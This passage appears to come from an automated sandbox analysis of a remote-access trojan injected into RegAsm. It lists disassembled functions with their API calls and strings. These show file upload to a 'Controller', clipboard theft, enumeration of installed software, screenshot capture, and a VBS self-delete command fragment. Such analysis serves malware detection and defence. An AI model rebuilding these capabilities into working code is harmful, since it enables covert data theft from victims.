                                                                • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
                                                                • API String ID: 1332880857-3714951968
                                                                • Opcode ID: bda5a057d1482af4b316a8033d0568fb74c7f5fd769d604243e8b29cd9515908
                                                                • Instruction ID: 8204223968f620e226549da85b9b34a309c849e8d9bbed411749b7727356edba
                                                                • Opcode Fuzzy Hash: bda5a057d1482af4b316a8033d0568fb74c7f5fd769d604243e8b29cd9515908
                                                                • Instruction Fuzzy Hash: 3E8133311082459BC325EF11D851EEFB7E8BF94309F10492FB589921A2FF74AE49CA5A
                                                                Function 0041D620 Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 74windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041D66B
                                                                • GetCursorPos.USER32(?), ref: 0041D67A
                                                                • SetForegroundWindow.USER32(?), ref: 0041D683
                                                                • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041D69D
                                                                • Shell_NotifyIconA.SHELL32(00000002,00474B48), ref: 0041D6EE
                                                                • ExitProcess.KERNEL32 ref: 0041D6F6
                                                                • CreatePopupMenu.USER32 ref: 0041D6FC
                                                                • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041D711
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                                                • String ID: Close
                                                                • API String ID: 1657328048-3535843008
                                                                • Opcode ID: 2cdbc08d807d068952302bab703dbbbb7de86244cd36d8f377370d21a5bc842f
                                                                • Instruction ID: ffebe08b42ddc2cad69fc5dc181b4667ce265f065f51bc56e4a7814a85689449
                                                                • Opcode Fuzzy Hash: 2cdbc08d807d068952302bab703dbbbb7de86244cd36d8f377370d21a5bc842f
                                                                • Instruction Fuzzy Hash: 2D213BB1544209FFDF155FA4ED0EAAA3F35EB08302F000125F909951B2D779EDA1EB19
                                                                Function 00445DD7 Relevance: 22.8, APIs: 15, Instructions: 296COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: _free$Info
                                                                • String ID:
                                                                • API String ID: 2509303402-0
                                                                • Opcode ID: 6f6fc0ac27b4b2f00b1102b51bee0220b0be09f2ed36c41455f2b0a14b53fe9c
                                                                • Instruction ID: 03d8b0dccc9171d7b4ee81f85837dfa1205ba0d7832ce976ccf3d084d520ac26
                                                                • Opcode Fuzzy Hash: 6f6fc0ac27b4b2f00b1102b51bee0220b0be09f2ed36c41455f2b0a14b53fe9c
                                                                • Instruction Fuzzy Hash: AFB1CE719002059FEB21DF69C881BEEBBF4BF09304F15842EF495A7242DB79AC458B69
                                                                Function 00408BB5 Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 328fileCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 00408D1E
                                                                • GetFileSizeEx.KERNEL32(00000000,?), ref: 00408D56
                                                                • __aulldiv.LIBCMT ref: 00408D88
                                                                  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                  • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 00408EAB
                                                                • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408EC6
                                                                • CloseHandle.KERNEL32(00000000), ref: 00408F9F
                                                                • CloseHandle.KERNEL32(00000000,00000052), ref: 00408FE9
                                                                • CloseHandle.KERNEL32(00000000), ref: 00409037
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: File$CloseHandle$CreateLocalPointerReadSizeTime__aulldivsend
                                                                • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $NG
                                                                • API String ID: 3086580692-2582957567
                                                                • Opcode ID: 3991cb73806a49c5ac684c1e5fded63b8ae94927034fce3271c358c0f33b2713
                                                                • Instruction ID: 3fce176daff91a8ac67d7e00268aa6ddaa8eb0a69c3dc15cdf5b3728eb075172
                                                                • Opcode Fuzzy Hash: 3991cb73806a49c5ac684c1e5fded63b8ae94927034fce3271c358c0f33b2713
                                                                • Instruction Fuzzy Hash: CCB1A1316083409BC314FB26C941AAFB7E5AFC4358F40492FF589622D2EF789945CB8B
                                                                Function 10007CC2 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                • ___free_lconv_mon.LIBCMT ref: 10007D06
                                                                  • Part of subcall function 100090BA: _free.LIBCMT ref: 100090D7
                                                                  • Part of subcall function 100090BA: _free.LIBCMT ref: 100090E9
                                                                  • Part of subcall function 100090BA: _free.LIBCMT ref: 100090FB
                                                                  • Part of subcall function 100090BA: _free.LIBCMT ref: 1000910D
                                                                  • Part of subcall function 100090BA: _free.LIBCMT ref: 1000911F
                                                                  • Part of subcall function 100090BA: _free.LIBCMT ref: 10009131
                                                                  • Part of subcall function 100090BA: _free.LIBCMT ref: 10009143
                                                                  • Part of subcall function 100090BA: _free.LIBCMT ref: 10009155
                                                                  • Part of subcall function 100090BA: _free.LIBCMT ref: 10009167
                                                                  • Part of subcall function 100090BA: _free.LIBCMT ref: 10009179
                                                                  • Part of subcall function 100090BA: _free.LIBCMT ref: 1000918B
                                                                  • Part of subcall function 100090BA: _free.LIBCMT ref: 1000919D
                                                                  • Part of subcall function 100090BA: _free.LIBCMT ref: 100091AF
                                                                • _free.LIBCMT ref: 10007CFB
                                                                  • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
                                                                  • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                • _free.LIBCMT ref: 10007D1D
                                                                • _free.LIBCMT ref: 10007D32
                                                                • _free.LIBCMT ref: 10007D3D
                                                                • _free.LIBCMT ref: 10007D5F
                                                                • _free.LIBCMT ref: 10007D72
                                                                • _free.LIBCMT ref: 10007D80
                                                                • _free.LIBCMT ref: 10007D8B
                                                                • _free.LIBCMT ref: 10007DC3
                                                                • _free.LIBCMT ref: 10007DCA
                                                                • _free.LIBCMT ref: 10007DE7
                                                                • _free.LIBCMT ref: 10007DFF
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4475206762.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                • Associated: 0000000B.00000002.4475172260.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4475206762.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_10000000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                • String ID:
                                                                • API String ID: 161543041-0
                                                                • Opcode ID: 04f87de51616aa77c632626b63215b7c3e2981daeb02be256c48a4a07a0be686
                                                                • Instruction ID: 6de9b84f5b51ee4e35cbeb1ed48e08772f21b212059d2ac72beb9c863e9ed859
                                                                • Opcode Fuzzy Hash: 04f87de51616aa77c632626b63215b7c3e2981daeb02be256c48a4a07a0be686
                                                                • Instruction Fuzzy Hash: 90313931A04645EFFB21DA38E941B6A77FAFF002D1F11446AE84DDB159DE3ABC809B14
                                                                Function 00451346 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                • ___free_lconv_mon.LIBCMT ref: 0045138A
                                                                  • Part of subcall function 00450582: _free.LIBCMT ref: 0045059F
                                                                  • Part of subcall function 00450582: _free.LIBCMT ref: 004505B1
                                                                  • Part of subcall function 00450582: _free.LIBCMT ref: 004505C3
                                                                  • Part of subcall function 00450582: _free.LIBCMT ref: 004505D5
                                                                  • Part of subcall function 00450582: _free.LIBCMT ref: 004505E7
                                                                  • Part of subcall function 00450582: _free.LIBCMT ref: 004505F9
                                                                  • Part of subcall function 00450582: _free.LIBCMT ref: 0045060B
                                                                  • Part of subcall function 00450582: _free.LIBCMT ref: 0045061D
                                                                  • Part of subcall function 00450582: _free.LIBCMT ref: 0045062F
                                                                  • Part of subcall function 00450582: _free.LIBCMT ref: 00450641
                                                                  • Part of subcall function 00450582: _free.LIBCMT ref: 00450653
                                                                  • Part of subcall function 00450582: _free.LIBCMT ref: 00450665
                                                                  • Part of subcall function 00450582: _free.LIBCMT ref: 00450677
                                                                • _free.LIBCMT ref: 0045137F
                                                                  • Part of subcall function 00446802: RtlFreeHeap.NTDLL(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
                                                                  • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                                • _free.LIBCMT ref: 004513A1
                                                                • _free.LIBCMT ref: 004513B6
                                                                • _free.LIBCMT ref: 004513C1
                                                                • _free.LIBCMT ref: 004513E3
                                                                • _free.LIBCMT ref: 004513F6
                                                                • _free.LIBCMT ref: 00451404
                                                                • _free.LIBCMT ref: 0045140F
                                                                • _free.LIBCMT ref: 00451447
                                                                • _free.LIBCMT ref: 0045144E
                                                                • _free.LIBCMT ref: 0045146B
                                                                • _free.LIBCMT ref: 00451483
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                • String ID:
                                                                • API String ID: 161543041-0
                                                                • Opcode ID: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                                                                • Instruction ID: 2428002f6fd8eb1a99257b9b861ac38f7c05b5b97acacff09fd9d8cf260fe807
                                                                • Opcode Fuzzy Hash: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                                                                • Instruction Fuzzy Hash: 403193715003009FEB20AA39D846F5B73E8EF02315F62992FE849D7662DF78AD44C729
                                                                Function 0041A045 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 176sleeptimeCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog.LIBCMT ref: 0041A04A
                                                                • GdiplusStartup.GDIPLUS(00474ACC,?,00000000), ref: 0041A07C
                                                                • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 0041A108
                                                                • Sleep.KERNEL32(000003E8), ref: 0041A18E
                                                                • GetLocalTime.KERNEL32(?), ref: 0041A196
                                                                • Sleep.KERNEL32(00000000,00000018,00000000), ref: 0041A285
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                                                                • String ID: time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i$PG$PG$PG
                                                                • API String ID: 489098229-1431523004
                                                                • Opcode ID: a9a564c4fa78c27a57715e2126324e45245b8a766e259b72a025c3b0d3967f40
                                                                • Instruction ID: 12d64888f2a2aa40a87de1a625a26b3edd7a2139bf4817292c9f8cf1352d8a2d
                                                                • Opcode Fuzzy Hash: a9a564c4fa78c27a57715e2126324e45245b8a766e259b72a025c3b0d3967f40
                                                                • Instruction Fuzzy Hash: 7A517D70A002159ACB14BBB5C8529FD77A9AF54308F40407FF509AB1E2EF7C9D85C799
                                                                Function 0040D83A Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 148COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 0041288B: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F903), ref: 0041289B
                                                                  • Part of subcall function 0041288B: WaitForSingleObject.KERNEL32(000000FF), ref: 004128AE
                                                                  • Part of subcall function 00413733: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,004752F0), ref: 0041374F
                                                                  • Part of subcall function 00413733: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 00413768
                                                                  • Part of subcall function 00413733: RegCloseKey.KERNEL32(00000000), ref: 00413773
                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040D894
                                                                • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000000), ref: 0040D9F3
                                                                • ExitProcess.KERNEL32 ref: 0040D9FF
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                                                • String ID: """, 0$.vbs$8SG$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
                                                                • API String ID: 1913171305-3159800282
                                                                • Opcode ID: 8db7f9089fcdac6088c6dca5af5b566ceab7d3a4e33a82e448366c6afc64066d
                                                                • Instruction ID: 6f299f75ad759bd4c56b3f4cab90e5e1fe41ff60d22e8747b975e3d2bb757992
                                                                • Opcode Fuzzy Hash: 8db7f9089fcdac6088c6dca5af5b566ceab7d3a4e33a82e448366c6afc64066d
                                                                • Instruction Fuzzy Hash: 9B4129719001155ACB15FBA2DC56DEEB778AF50709F10017FB10AB21E2FF785E8ACA98
                                                                Function 00450680 Relevance: 18.4, APIs: 12, Instructions: 376COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: _free
                                                                • String ID:
                                                                • API String ID: 269201875-0
                                                                • Opcode ID: f91d4b90763e5671f10523a72ee64b05bbc7cd6159c247d47fb1287d0ca389aa
                                                                • Instruction ID: 80ca3ff3fa16d46db3e6ae4c9b8471dba03f652ca918f9f25067e0b92ee87d4d
                                                                • Opcode Fuzzy Hash: f91d4b90763e5671f10523a72ee64b05bbc7cd6159c247d47fb1287d0ca389aa
                                                                • Instruction Fuzzy Hash: 30C183B6D40204ABEB20DBA9CC43FDE77F8AB09705F150166FE04EB283D6B49D459768
                                                                Function 00455C5B Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 00455929: CreateFileW.KERNEL32(00000000,00000000,?,00455D04,?,?,00000000,?,00455D04,00000000,0000000C), ref: 00455946
                                                                • GetLastError.KERNEL32 ref: 00455D6F
                                                                • __dosmaperr.LIBCMT ref: 00455D76
                                                                • GetFileType.KERNEL32(00000000), ref: 00455D82
                                                                • GetLastError.KERNEL32 ref: 00455D8C
                                                                • __dosmaperr.LIBCMT ref: 00455D95
                                                                • CloseHandle.KERNEL32(00000000), ref: 00455DB5
                                                                • CloseHandle.KERNEL32(?), ref: 00455EFF
                                                                • GetLastError.KERNEL32 ref: 00455F31
                                                                • __dosmaperr.LIBCMT ref: 00455F38
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                • String ID: H
                                                                • API String ID: 4237864984-2852464175
                                                                • Opcode ID: 3e80e4deedef708004bf5c1f14aafc2c87dd9643035db764e93b071d2df20022
                                                                • Instruction ID: 7cd045c9b8f196398d23f94ba58010557f508cd7b58f44c29b3e784ccbbfb847
                                                                • Opcode Fuzzy Hash: 3e80e4deedef708004bf5c1f14aafc2c87dd9643035db764e93b071d2df20022
                                                                • Instruction Fuzzy Hash: 44A14532A106049FDF19AF68DC657BE3BA0EB06325F24015EEC11AB392D6398D1AC759
                                                                Function 00450AA5 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 204COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: _free
                                                                • String ID: \&G$\&G$`&G
                                                                • API String ID: 269201875-253610517
                                                                • Opcode ID: 4c79e0627c8f19053a14b01c9d065665146560bb3788e30f1103ba49badb8175
                                                                • Instruction ID: 59c4f5d9f803fa3be21c2588ad204ea2c1e8261bb9e1a4607c4596bf86990b35
                                                                • Opcode Fuzzy Hash: 4c79e0627c8f19053a14b01c9d065665146560bb3788e30f1103ba49badb8175
                                                                • Instruction Fuzzy Hash: 86610E75900205AFDB21DF69C842B9ABBF4EF06710F24426BED44EB242E774AD45CB58
                                                                Function 00414BEB Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 158COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 65535$udp
                                                                • API String ID: 0-1267037602
                                                                • Opcode ID: 92e56e7e39f2557d79d3192c533dec3724d183fd0175ec4c26052f24408cebce
                                                                • Instruction ID: a9902b4e2b63063b067a15c036b171ad6d3a8658db747517b03e91dd9f9ead29
                                                                • Opcode Fuzzy Hash: 92e56e7e39f2557d79d3192c533dec3724d183fd0175ec4c26052f24408cebce
                                                                • Instruction Fuzzy Hash: FB51D431605301ABDB609B14E905BFB77E8ABC5754F08042FF88597390E76CCCC1969E
                                                                Function 0043A8BA Relevance: 16.6, APIs: 11, Instructions: 116COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A912
                                                                • GetLastError.KERNEL32(?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A91F
                                                                • __dosmaperr.LIBCMT ref: 0043A926
                                                                • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A952
                                                                • GetLastError.KERNEL32(?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A95C
                                                                • __dosmaperr.LIBCMT ref: 0043A963
                                                                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401D55,?), ref: 0043A9A6
                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A9B0
                                                                • __dosmaperr.LIBCMT ref: 0043A9B7
                                                                • _free.LIBCMT ref: 0043A9C3
                                                                • _free.LIBCMT ref: 0043A9CA
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                                                • String ID:
                                                                • API String ID: 2441525078-0
                                                                • Opcode ID: 289d0842b92f941f4feb2be478b72c6b1387c4c53bdf58ebb9c1b022d59fa5b6
                                                                • Instruction ID: 3a2165a63a30732921e8d6571a772c998230e0148124485b419b79488018c54b
                                                                • Opcode Fuzzy Hash: 289d0842b92f941f4feb2be478b72c6b1387c4c53bdf58ebb9c1b022d59fa5b6
                                                                • Instruction Fuzzy Hash: 8631D5B180420AFBDF01AFA5CC45EAF3B6CEF09324F11451AF950662A1DB38CD61DB66
                                                                Function 004054A0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 155windowmemoryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • SetEvent.KERNEL32(?,?), ref: 004054BF
                                                                • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0040556F
                                                                • TranslateMessage.USER32(?), ref: 0040557E
                                                                • DispatchMessageA.USER32(?), ref: 00405589
                                                                • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00474F78), ref: 00405641
                                                                • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 00405679
                                                                  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                                                • String ID: CloseChat$DisplayMessage$GetMessage
                                                                • API String ID: 2956720200-749203953
                                                                • Opcode ID: 61777b78d13ae972d202e0e0494eb207e9581ea4d3c00321eb55f2570f667da8
                                                                • Instruction ID: d37e718accd843302ceacc2187c81124e04698433963f5de03abd71ab6b9016f
                                                                • Opcode Fuzzy Hash: 61777b78d13ae972d202e0e0494eb207e9581ea4d3c00321eb55f2570f667da8
                                                                • Instruction Fuzzy Hash: 39419071A04301ABCB14FB76DC5A86F37A9AB85704F40493EF516A31E1EF3C8905CB9A
                                                                Function 00417D1A Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 108filesynchronizationCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 00417F67: __EH_prolog.LIBCMT ref: 00417F6C
                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,004660B4), ref: 00417E17
                                                                • CloseHandle.KERNEL32(00000000), ref: 00417E20
                                                                • DeleteFileA.KERNEL32(00000000), ref: 00417E2F
                                                                • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00417DE3
                                                                  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CloseDeleteExecuteFileH_prologHandleObjectShellSingleWaitsend
                                                                • String ID: 0VG$0VG$<$@$Temp
                                                                • API String ID: 1704390241-2575729100
                                                                • Opcode ID: 56381d62612dfaeda6f40a421600c7779e16d03d52b50a481ca23e24a9b19417
                                                                • Instruction ID: 01f79aac078c9204ae4226344def03f9678a0966abb138ad227abf0e83d93267
                                                                • Opcode Fuzzy Hash: 56381d62612dfaeda6f40a421600c7779e16d03d52b50a481ca23e24a9b19417
                                                                • Instruction Fuzzy Hash: 18417E319002099ACB14FB62DC56AEE7735AF00318F50417EF50A761E1EF7C5A8ACB99
                                                                Function 0041697B Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 46clipboardCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • OpenClipboard.USER32 ref: 0041697C
                                                                • EmptyClipboard.USER32 ref: 0041698A
                                                                • CloseClipboard.USER32 ref: 00416990
                                                                • OpenClipboard.USER32 ref: 00416997
                                                                • GetClipboardData.USER32(0000000D), ref: 004169A7
                                                                • GlobalLock.KERNEL32(00000000), ref: 004169B0
                                                                • GlobalUnlock.KERNEL32(00000000), ref: 004169B9
                                                                • CloseClipboard.USER32 ref: 004169BF
                                                                  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
